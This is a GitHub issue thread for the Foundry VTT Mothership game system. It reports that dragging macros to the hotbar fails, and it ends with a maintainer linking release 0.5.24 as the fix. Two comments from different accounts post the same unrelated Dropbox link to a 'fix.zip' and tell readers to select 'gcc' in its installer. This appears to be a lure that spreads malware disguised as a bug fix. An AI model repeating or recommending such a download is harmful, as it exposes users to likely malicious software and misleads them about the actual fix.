### ISSUE TITLE
Drag from Macro Folder to Hotbar

### ISSUE THREAD

**Issue by m8ryx** [Futil/foundry-mothership#46]
Expected: 
As user GM or mortal, when I drag a macro from the macro folder to the hotbar, it should be available.

Actual: Nothing happens. A plus sign appears under the image, but it just goes away - I do not see anything logged to the Developer console.

Environment: mosh 0.5.23, foundry v12 build 331, Linux (deb based). I tried it with disabling all modules in the game world.

Notes: also, I tested in another (non-mosh) game world, and it worked as expected.

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by hollowphoton** [comment]
Fixed! https://github.com/Futil/foundry-mothership/releases/tag/0.5.24
